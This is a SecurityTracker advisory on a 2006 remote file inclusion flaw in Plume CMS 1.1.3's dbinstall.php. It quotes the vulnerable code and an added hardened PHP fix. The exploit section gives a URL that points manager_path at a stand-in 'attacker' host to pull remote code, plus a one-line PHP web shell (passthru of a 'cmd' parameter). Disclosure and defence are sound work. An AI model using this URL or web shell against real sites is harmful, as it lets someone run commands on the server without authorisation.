SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   Plume CMS
Vendors:   plume-cms.net
Plume CMS Include File Flaw in 'dbinstall.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016415
SecurityTracker URL:  http://securitytracker.com/id/1016415
CVE Reference:   CVE-2006-7021
Updated:  Aug 12 2008
Original Entry Date:  Jun 30 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1.3
Description:   Hamid Ebadi of IRAN HOMELAND SECURITY team reported a vulnerability in Plume CMS. A remote user can include and execute arbitrary code on the target system.

The 'manager/tools/link/dbinstall.php' script does not properly validate user-supplied input in the 'manager_path' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

The original advisory is available at:

http://www.hamid.ir/security/
http://www.IHSteam.com

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.plume-cms.net/
Cause:   Input validation error, State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Fri, 30 Jun 2006 06:04:21 -0700 (PDT)
Subject:  Plume CMS Remote File Inclusion

/*------------------------------------------------
		IHS Public advisory 
-------------------------------------------------*/

Plume CMS Remote File Inclusion

It uses PHP and MySql. With a single installation of
Plume you can have
multiple websites, file management, multiple authors
with different rights and websites in any languages
thanks to a full utf-8 support.
Plume CMS proposes a flexible plugin infrastructure to
extend it and is fully accessible with output
providing standard compliant code by default. 
http://plume-cms.net


Discovered by Hamid Ebadi 
Credit :
all go to IHS team (IHS : IRAN HOMELAND SECURITY)
www.ihsteam.com (persian)
www.ihsteam.net (english)


The original article can be found at: 
http://www.hamid.ir/security/
http://www.IHSteam.com

Vulnerable Systems:
	Plume CMS 1.1.3
	

Vulnerable Code :

[path]/plume-1.1.3/plume/manager/tools/link/dbinstall.php
//Vulnerable Code :line 39
require_once $_PX_config['manager_path'].'/inc/class.checklist.php';
require_once $_PX_config['manager_path'].'/extinc/class.xmlsql.php';



Exploits:

The following URL will cause the server to include external files
http://localhost/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls -al&_PX_config[manager_path]=http://attacker/cmd.gif?

cmd.gif
<?
passthru($_GET['cmd']);
?>

Solution:
Edit the source code to ensure that input is properly verified.


greeting :
LorD , NT , C0d3r of IHS
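
A hardened form of the two require_once lines quoted in the source message, as an added example that is not part of the original advisory or of Plume CMS: it refuses configuration supplied in the request and accepts manager_path only when it resolves to the local manager directory. The helper name px_trusted_manager_path, PHP 7 or later, and dbinstall.php sitting two directories below the manager directory are assumptions.

```php
<?php
// Added example, not Plume CMS code. Assumes PHP 7+ and that this file sits at
// manager/tools/link/dbinstall.php, so the manager directory is two levels up.

/**
 * Return a manager path that is safe to use in require_once, or throw.
 * px_trusted_manager_path() is a hypothetical helper name.
 */
function px_trusted_manager_path(array $config, array $request, string $expectedDir): string
{
    // Configuration must never be supplied by the client. With register_globals
    // enabled, ?_PX_config[manager_path]=... would populate $_PX_config directly.
    if (array_key_exists('_PX_config', $request)) {
        throw new RuntimeException('_PX_config present in request data');
    }

    $path = $config['manager_path'] ?? '';
    if (!is_string($path) || $path === '') {
        throw new RuntimeException('manager_path was not set by the application');
    }

    // realpath() resolves local filesystem paths only; for a URL such as
    // http://host/file it returns false, so remote locations are rejected here.
    $real     = realpath($path);
    $expected = realpath($expectedDir);
    if ($real === false || $expected === false || $real !== $expected) {
        throw new RuntimeException('manager_path is not the local manager directory');
    }
    return $real;
}

try {
    $managerPath = px_trusted_manager_path(
        isset($_PX_config) && is_array($_PX_config) ? $_PX_config : [],
        $_GET + $_POST + $_COOKIE,   // every client-controlled source
        dirname(__DIR__, 2)          // .../manager, derived from this file's location
    );
} catch (RuntimeException $e) {
    http_response_code(403);
    exit('Forbidden');
}

require_once $managerPath . '/inc/class.checklist.php';
require_once $managerPath . '/extinc/class.xmlsql.php';
```

Independently of the code change, keeping allow_url_include = Off in php.ini and running PHP without register_globals means a request parameter can neither populate $_PX_config nor point require_once at a remote URL.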

Copyright 2014, SecurityGlobal.net LLC